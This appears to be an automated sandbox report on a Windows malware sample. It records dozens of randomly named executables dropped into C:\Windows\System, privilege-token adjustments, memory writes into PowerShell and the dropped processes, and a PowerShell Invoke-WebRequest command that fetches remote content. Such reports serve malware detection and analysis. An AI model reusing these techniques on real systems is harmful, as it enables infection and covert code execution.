File created C:\Windows\System\BiAwExH.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FYbzrcp.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hJKEEfb.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UbHpooR.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FWBUiMu.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zRvVClI.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gtwVIBZ.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TeiXeXX.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CDrHuLn.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KpNlvri.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nnmUObu.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\DHpucKX.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\oCcZcKC.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JtXrfrU.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ojDxado.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FcxUCYZ.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\juGCKsm.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LefkmpN.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GXFdplK.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hUFfJXw.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yFxoNTN.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YdCAatk.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nXRyuQi.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AYQWoFw.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\INUHpMp.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MsSxbud.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UgOUQHS.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\cYrSDDi.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\psRuAbO.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GdGkoXm.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OVnaYCr.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yLYEYuR.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hVvxWgW.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NptRdUb.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZxnfKff.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vItjaGI.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AqfuqVB.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xqpIkVW.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VARkopk.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\cpKYhIx.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yXFvblT.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\oFzTvYv.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qRswTPH.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pfINHAu.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jFiIPzA.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kjMbSpS.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\twyLZxV.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\mPPBtUV.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NtGIHSP.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SwJkHXt.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\sXxEwza.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2212 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2212 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2212 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2212 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\JNjawlY.exe
PID 2212 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\JNjawlY.exe
PID 2212 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\JNjawlY.exe
PID 2212 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\VzRiJoZ.exe
PID 2212 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\VzRiJoZ.exe
PID 2212 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\VzRiJoZ.exe
PID 2212 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\zkvquNG.exe
PID 2212 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\zkvquNG.exe
PID 2212 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\zkvquNG.exe
PID 2212 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\hkAJvxn.exe
PID 2212 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\hkAJvxn.exe
PID 2212 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\hkAJvxn.exe
PID 2212 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\ohQpMmK.exe
PID 2212 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\ohQpMmK.exe
PID 2212 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\ohQpMmK.exe
PID 2212 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\NTirKXC.exe
PID 2212 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\NTirKXC.exe
PID 2212 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\NTirKXC.exe
PID 2212 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\ZASDHLY.exe
PID 2212 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\ZASDHLY.exe
PID 2212 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\ZASDHLY.exe
PID 2212 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\IoPasPV.exe
PID 2212 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\IoPasPV.exe
PID 2212 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\IoPasPV.exe
PID 2212 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\RfZqoFO.exe
PID 2212 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\RfZqoFO.exe
PID 2212 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\RfZqoFO.exe
PID 2212 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\vXeLESQ.exe
PID 2212 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\vXeLESQ.exe
PID 2212 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\vXeLESQ.exe
PID 2212 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\YhrpLxc.exe
PID 2212 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\YhrpLxc.exe
PID 2212 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\YhrpLxc.exe
PID 2212 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\DQdwpES.exe
PID 2212 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\DQdwpES.exe
PID 2212 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\DQdwpES.exe
PID 2212 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\pORfgZg.exe
PID 2212 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\pORfgZg.exe
PID 2212 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\pORfgZg.exe
PID 2212 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\EMTNkDj.exe
PID 2212 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\EMTNkDj.exe
PID 2212 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\EMTNkDj.exe
PID 2212 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\rfqnVcU.exe
PID 2212 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\rfqnVcU.exe
PID 2212 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\rfqnVcU.exe
PID 2212 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\Vgtrjlz.exe
PID 2212 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\Vgtrjlz.exe
PID 2212 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\Vgtrjlz.exe
PID 2212 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\lxezhLA.exe
PID 2212 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\lxezhLA.exe
PID 2212 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\lxezhLA.exe
PID 2212 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\xuaHwvm.exe
PID 2212 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\xuaHwvm.exe
PID 2212 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\xuaHwvm.exe
PID 2212 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\cJHRFOf.exe
PID 2212 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\cJHRFOf.exe
PID 2212 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\cJHRFOf.exe
PID 2212 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\qNCjLsp.exe
PID 2212 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\qNCjLsp.exe
PID 2212 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\qNCjLsp.exe
PID 2212 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\ruBTdYh.exe

Processes

C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\JNjawlY.exe

C:\Windows\System\JNjawlY.exe

C:\Windows\System\VzRiJoZ.exe

C:\Windows\System\VzRiJoZ.exe

C:\Windows\System\zkvquNG.exe

C:\Windows\System\zkvquNG.exe

C:\Windows\System\hkAJvxn.exe

C:\Windows\System\hkAJvxn.exe

C:\Windows\System\ohQpMmK.exe

C:\Windows\System\ohQpMmK.exe

C:\Windows\System\NTirKXC.exe

C:\Windows\System\NTirKXC.exe

C:\Windows\System\ZASDHLY.exe

C:\Windows\System\ZASDHLY.exe

C:\Windows\System\IoPasPV.exe

C:\Windows\System\IoPasPV.exe

C:\Windows\System\RfZqoFO.exe

C:\Windows\System\RfZqoFO.exe

C:\Windows\System\vXeLESQ.exe

C:\Windows\System\vXeLESQ.exe

C:\Windows\System\YhrpLxc.exe

C:\Windows\System\YhrpLxc.exe

C:\Windows\System\DQdwpES.exe

C:\Windows\System\DQdwpES.exe

C:\Windows\System\pORfgZg.exe

C:\Windows\System\pORfgZg.exe

C:\Windows\System\EMTNkDj.exe

C:\Windows\System\EMTNkDj.exe

C:\Windows\System\rfqnVcU.exe

C:\Windows\System\rfqnVcU.exe

C:\Windows\System\Vgtrjlz.exe

C:\Windows\System\Vgtrjlz.exe

C:\Windows\System\lxezhLA.exe

C:\Windows\System\lxezhLA.exe

C:\Windows\System\xuaHwvm.exe

C:\Windows\System\xuaHwvm.exe

C:\Windows\System\cJHRFOf.exe

C:\Windows\System\cJHRFOf.exe

C:\Windows\System\qNCjLsp.exe

C:\Windows\System\qNCjLsp.exe

C:\Windows\System\ruBTdYh.exe

C:\Windows\System\ruBTdYh.exe

C:\Windows\System\dhSpIZl.exe

C:\Windows\System\dhSpIZl.exe

C:\Windows\System\gKtcUYG.exe

C:\Windows\System\gKtcUYG.exe

C:\Windows\System\BCtPdAN.exe

C:\Windows\System\BCtPdAN.exe

C:\Windows\System\FKFTSzm.exe

C:\Windows\System\FKFTSzm.exe

C:\Windows\System\pGoRTCY.exe

C:\Windows\System\pGoRTCY.exe

C:\Windows\System\gOrqmJB.exe

C:\Windows\System\gOrqmJB.exe

C:\Windows\System\olMQlKv.exe

C:\Windows\System\olMQlKv.exe

C:\Windows\System\DTGNfwP.exe

C:\Windows\System\DTGNfwP.exe

C:\Windows\System\fmAvSbw.exe

C:\Windows\System\fmAvSbw.exe

C:\Windows\System\AMqpqYw.exe

C:\Windows\System\AMqpqYw.exe

C:\Windows\System\BkmpRoh.exe

C:\Windows\System\BkmpRoh.exe

C:\Windows\System\LkhSFoW.exe

C:\Windows\System\LkhSFoW.exe

C:\Windows\System\BsmHOnf.exe

C:\Windows\System\BsmHOnf.exe

C:\Windows\System\fVWTzSF.exe

C:\Windows\System\fVWTzSF.exe

C:\Windows\System\TDziNYZ.exe

C:\Windows\System\TDziNYZ.exe

C:\Windows\System\zxGFZum.exe

C:\Windows\System\zxGFZum.exe

C:\Windows\System\VFsHomq.exe

C:\Windows\System\VFsHomq.exe

C:\Windows\System\iHvrKSc.exe

C:\Windows\System\iHvrKSc.exe

C:\Windows\System\iBvLcwS.exe

C:\Windows\System\iBvLcwS.exe

C:\Windows\System\yoHotwJ.exe

C:\Windows\System\yoHotwJ.exe

C:\Windows\System\XYwUrAU.exe

C:\Windows\System\XYwUrAU.exe

C:\Windows\System\HqkwFGh.exe

C:\Windows\System\HqkwFGh.exe

C:\Windows\System\EIEcLPt.exe

C:\Windows\System\EIEcLPt.exe

C:\Windows\System\WFQCKlQ.exe

C:\Windows\System\WFQCKlQ.exe

C:\Windows\System\jUoFdnL.exe

C:\Windows\System\jUoFdnL.exe

C:\Windows\System\yiZvGln.exe

C:\Windows\System\yiZvGln.exe

C:\Windows\System\rSgLWSO.exe

C:\Windows\System\rSgLWSO.exe

C:\Windows\System\BwEicrA.exe

C:\Windows\System\BwEicrA.exe

C:\Windows\System\YMtkUqi.exe

C:\Windows\System\YMtkUqi.exe

C:\Windows\System\rgikvRZ.exe

C:\Windows\System\rgikvRZ.exe

C:\Windows\System\TZxHZJu.exe

C:\Windows\System\TZxHZJu.exe

C:\Windows\System\UjJdmiD.exe

C:\Windows\System\UjJdmiD.exe

C:\Windows\System\qXvnsNr.exe

C:\Windows\System\qXvnsNr.exe

C:\Windows\System\AYqJGee.exe

C:\Windows\System\AYqJGee.exe

C:\Windows\System\FPMsKdj.exe

C:\Windows\System\FPMsKdj.exe

C:\Windows\System\mvJYIbG.exe

C:\Windows\System\mvJYIbG.exe

C:\Windows\System\VgTDxJU.exe

C:\Windows\System\VgTDxJU.exe

C:\Windows\System\vvpaPqW.exe

C:\Windows\System\vvpaPqW.exe

C:\Windows\System\MWIrnNw.exe

C:\Windows\System\MWIrnNw.exe

C:\Windows\System\WXwkEpJ.exe

C:\Windows\System\WXwkEpJ.exe

C:\Windows\System\TRpPPXD.exe

C:\Windows\System\TRpPPXD.exe

C:\Windows\System\RnEvGFv.exe

C:\Windows\System\RnEvGFv.exe

C:\Windows\System\pEYaYrm.exe

C:\Windows\System\pEYaYrm.exe

C:\Windows\System\MtPMvqa.exe

C:\Windows\System\MtPMvqa.exe

C:\Windows\System\GcptnYn.exe

C:\Windows\System\GcptnYn.exe

C:\Windows\System\sAzpgul.exe

C:\Windows\System\sAzpgul.exe

C:\Windows\System\BkJAuGR.exe

C:\Windows\System\BkJAuGR.exe

C:\Windows\System\Itmqbou.exe

C:\Windows\System\Itmqbou.exe

C:\Windows\System\MviVvYf.exe

C:\Windows\System\MviVvYf.exe

C:\Windows\System\OGYraiS.exe

C:\Windows\System\OGYraiS.exe

C:\Windows\System\MOgevSJ.exe

C:\Windows\System\MOgevSJ.exe

C:\Windows\System\APmgImr.exe

C:\Windows\System\APmgImr.exe

C:\Windows\System\ZEBMoFd.exe

C:\Windows\System\ZEBMoFd.exe

C:\Windows\System\CPeUnwV.exe

C:\Windows\System\CPeUnwV.exe

C:\Windows\System\HxlIBjS.exe

C:\Windows\System\HxlIBjS.exe

C:\Windows\System\kilmEgV.exe

C:\Windows\System\kilmEgV.exe

C:\Windows\System\ybSWNPX.exe

C:\Windows\System\ybSWNPX.exe

C:\Windows\System\GHKZXuH.exe

C:\Windows\System\GHKZXuH.exe

C:\Windows\System\IuvwXnD.exe

C:\Windows\System\IuvwXnD.exe

C:\Windows\System\tDPvbHc.exe

C:\Windows\System\tDPvbHc.exe

C:\Windows\System\KCNAYCi.exe

C:\Windows\System\KCNAYCi.exe

C:\Windows\System\WOwtzAq.exe

C:\Windows\System\WOwtzAq.exe

C:\Windows\System\qxCaDJQ.exe

C:\Windows\System\qxCaDJQ.exe

C:\Windows\System\UXNddcq.exe

C:\Windows\System\UXNddcq.exe

C:\Windows\System\VTXwcFl.exe

C:\Windows\System\VTXwcFl.exe

C:\Windows\System\DYRPrHN.exe

C:\Windows\System\DYRPrHN.exe

C:\Windows\System\PrZKblu.exe

C:\Windows\System\PrZKblu.exe

C:\Windows\System\ahTDbwX.exe

C:\Windows\System\ahTDbwX.exe

C:\Windows\System\HvrlCqI.exe

C:\Windows\System\HvrlCqI.exe

C:\Windows\System\egKgZgh.exe

C:\Windows\System\egKgZgh.exe

C:\Windows\System\xFavAcY.exe

C:\Windows\System\xFavAcY.exe

C:\Windows\System\GKBWUeK.exe

C:\Windows\System\GKBWUeK.exe

C:\Windows\System\LJROInU.exe

C:\Windows\System\LJROInU.exe

C:\Windows\System\ADLNLFn.exe

C:\Windows\System\ADLNLFn.exe

C:\Windows\System\agqIeBi.exe

C:\Windows\System\agqIeBi.exe

C:\Windows\System\drRGUlY.exe

C:\Windows\System\drRGUlY.exe

C:\Windows\System\CqWJxHz.exe

C:\Windows\System\CqWJxHz.exe

C:\Windows\System\AxmlWMt.exe

C:\Windows\System\AxmlWMt.exe

C:\Windows\System\jdDqkxb.exe

C:\Windows\System\jdDqkxb.exe

C:\Windows\System\BWuOvOa.exe

C:\Windows\System\BWuOvOa.exe

C:\Windows\System\LPwjJXP.exe

C:\Windows\System\LPwjJXP.exe

C:\Windows\System\ZaLfKnE.exe

C:\Windows\System\ZaLfKnE.exe

C:\Windows\System\OoMRtQj.exe

C:\Windows\System\OoMRtQj.exe

C:\Windows\System\zoNRjTw.exe

C:\Windows\System\zoNRjTw.exe

